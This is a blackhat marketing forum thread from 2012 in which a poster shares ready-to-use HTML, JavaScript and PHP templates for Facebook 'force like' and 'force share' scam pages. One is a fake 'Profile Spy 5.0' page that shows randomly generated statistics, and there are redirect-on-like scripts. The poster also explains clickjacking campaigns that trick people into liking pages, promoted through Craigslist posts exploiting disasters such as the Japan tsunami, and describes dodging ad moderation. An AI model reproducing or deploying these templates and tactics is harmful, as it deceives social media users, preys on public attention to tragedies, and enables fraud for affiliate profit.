logo
 
Go Back   WebSiteWarriors - Blackhat/Whitehat Seo and Internet Marketing > Special VIP Section > PlatinumVIP Section > BlackHatWorld VIP

Simple way to milk the most money out of your BH FB campaigns, a free template and CL

Subject content: Simple way to milk the most money out of your BH FB campaigns, a free template and CL imple way to milk the most money out of your BH FB campaigns, a free template and CL+FB Ok, so a lot of people aren't doing this ...
Tags: campaigns, free, milk, money, simple, template,Simple way to milk the most money out of your BH FB campaigns, a free template and CL...

Reply
 
LinkBack Thread Tools Display Modes
  #1  
Old 02-21-2012, 01:56 PM
stylus's Avatar
BOSS
 
Join Date: Jan 2012
Posts: 640
Default Simple way to milk the most money out of your BH FB campaigns, a free template and CL

Simple way to milk the most money out of your BH FB campaigns, a free template and CL
imple way to milk the most money out of your BH FB campaigns, a free template and CL+FB
Ok, so a lot of people aren't doing this but I have been and it works really well. It's a really obvious trick (some would say it's old, lol).. but it's overlooked and definitely worth doing!

First, you obviously need to already have a viral campaign..

Second, this is gonna amaze you, just send them to a force like page instead of straight to a widget. Or, you could get a script that will share the traffic to this page from your viral BH campaign..... or.. once you're viral for about.. 5 hours, you just switch to a redirect and laugh when you wake up the next day and your am is asking how you sent traffic. (I got over 100K clicks in starter traffic this way)

It's that easy.. I went from $1, $2K days with CJ only lasting 1 day per workaround to having 1 page on 1 domain last a whole WEEK and make me over $15K and give me over 400K likes to post on which made me a lot more money later


if you don't have this already... put the code below in the header this will redirect after someone likes your page and confirms. this is what the like should look like<fb:like href="http://yourdomain.com/" width="450" action="like" layout="button_count" show_faces="true"></fb:like>

Code:
<script type="text/javascript" charset="utf-8"> 
        function next_page() {
        window.location = "http://your-landing-page-url";
    }
    FB.Event.subscribe('edge.create', function(response) {
        next_page();
    });

</script>

This code will fix the "xd_fragment" bug that soooo many of you waste loads of traffic due to.. when this happens they see a blank page, you don't want that so put this right after <body>

Code:
<body>

  <script type="text/javascript"> 
    if(window.document.location.href.match('fb_xd_fragment')!=null)
    {
        var reg=/\?/
        window.document.location.href.match('fb_xd_fragment');
        var start=window.document.location.href.search(reg)
        window.location=window.document.location.href.substring(0,start);
    }
  </script>
hope this obvious overlooked method helps. also, you will notice your EPC goes up this way since the leads aren't as mad

How to use this method with a profile spy campaign (yup, different number for each like cj'ing this could be sexy.)

Code:
<?php 
srand ((double) microtime( )*1000000); 
$random_number = rand(1000,9000); 
$random_number2 = rand(10,50);
$random_number3 = rand(1,5);

?> 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  <meta name="description" content="" />
  <meta name="keywords" content="" />
<title>Profile Spy 5.0 - See Your Profile Views!</title>
  <meta property="og:title" content="My profile has been viewed: <?php echo $random_number; ?> times!" /> 
  <meta property="og:type" content="website" /> 
  <meta property="og:site_name" content="See them!" /> 
  <meta property="og:description" content=" I have spent <?php echo $random_number2; ?> hours on Facebook! . I have been blocked <?php echo $random_number3; ?> times! Find out your statistics!"/> 
  <meta property="og:image" content="http://i.imgur.com/Tkbog.jpg" /> 
<meta property="fb:app_id" content="203596412992256"/>
  <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script> 

<script>
  window.fbAsyncInit = function() {
    FB.init({appId: '203596412992256', status: true, cookie: true,
             xfbml: true});
  };
  (function() {
    var e = document.createElement('script'); e.async = true;
    e.src = document.location.protocol +
      '//connect.facebook.net/en_US/all.js';
    document.getElementById('fb-root').appendChild(e);
  }());
</script>

<script type="text/javascript" charset="utf-8"> 
        function next_page() {
        window.location = "http://your-domain.com/landingpage.html";
    }
    FB.Event.subscribe('edge.create', function(response) {
        next_page();
    });

</script>

</head>


<body><span style="font-family: Tahoma;">
<div id="fb-root"></div>
<script>
if(window.document.location.href.match('fb_xd_fragment')!=null)
{
    var reg=/\?/
    window.document.location.href.match('fb_xd_fragment');
    var start=window.document.location.href.search(reg)
    window.location=window.document.location.href.substring(0,start);
}
</script>

<center><img src="http://i.imgur.com/wKSLX.png" border="0">
<h3>Simply click LIKE to see YOUR statistics!</h3><br>
<fb:like  href="http://your-domain.com/"  width="30" action="like" layout="button_count" show_faces="true" ></fb:like><br><br>



</span>
</center>


</body>
</html>
and this is how you force share with a profile spy campaign:
Code:
body><span style="font-family: Tahoma;">
<div id="fb-root"></div>
<script>
if(window.document.location.href.match('fb_xd_fragment')!=null)
{
    var reg=/\?/
    window.document.location.href.match('fb_xd_fragment');
    var start=window.document.location.href.search(reg)
    window.location=window.document.location.href.substring(0,start);
}
</script>

<center><img src="http://i.imgur.com/wKSLX.png" border="0">
<h3>Simply SHARE to see MORE statistics!</h3><br>
<div id="share"><a href="#" onclick="share()">
<img src="http://i.imgur.com/AsPNL.png" border="0">
</a></div><br><br>

<div id="reserved" style="display:none">
<a href="http://landingpageurl/index.html/">
<img src="http://i.imgur.com/BSwW7.png" border="0"></a>
</div>


</center>

</span>
</body>
</html>
FREE TEMPLATE
Here is a basic force like template to get you started. This is an older version of one I had made so, enjoy. it gets about 40% LIKE rate and 34.7% if you force like + share. so if you can improve it go for it

Some of you guys might have seen this and copied it already, your welcome lol

All you have to do to force share + like, is put it ontop of like and tell them to share first. It works.



this post deserves its own thread but screw it. i'll keep it in here.

How to go viral on Facebook using Craigslist and get 95%+ USA traffic 8-)

Here's my proof from my very first test trying it with a Clickjacking campaign during the japan tsunami to get my non-japan external pages viral Basically, you wait til something horrible happens or something that becomes trending.. if it only lasts a few days, hours, weeks, doesn't matter. Then you setup a clickjacking page, which is either 1. liking itself (then you use the method above to keep it going) or 2. liking the page you want to go viral. So you end up with 2 pages, one is tricking people into liking the other. On CL, i avoid putting a widget on the video page so the ads rarely get flagged this way.

The % of people logged into FB on CL is pretty bad.. but.. they are mostly adults, with children, in high school, who have 1000's of friends. and of course, are one of their 54 friends (who are also their family, with xxxx friends!) The stats from this screenshot are just clicks FROM CL to my CJ page, which sent quite a few pages viral.

to perfect this, and never ever get your ads flagged (99% survivability?) only show the like button to people who are logged in, and redirect everyone who isnt to the video.. but I still have multiple ads up, today, without this lol

btw... this was only like 30 posts lol. You want to post something like "Raw Footage of Disaster here" and {shocking|scary|amazing|wtf} is all you need for body with a screenshot.

ALSO, this doesn't only work with clickjacking. You can get likes/shares/whatever you want just by forcing them using CL traffic also.

Edit: the section I was mostly posting in was Rant and Raves for trending topics.. and free stuff for free stuff pages.



Reply With Quote
  #2  
Old 03-21-2012, 10:07 PM
Member
 
Join Date: Mar 2012
Posts: 88
Default

see hidden


Reply With Quote
Reply

Tags
campaigns, free, milk, money, simple, template

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT. The time now is 10:17 AM.

Powered by vBulletin™ Version 3.8.5  Copyright Jelsoft Enterprises Ltd. ©2000 - 2012
Search Engine Optimization by vBSEO 3.6.0
Support by tr-vBulletin - Mesut DOĞAN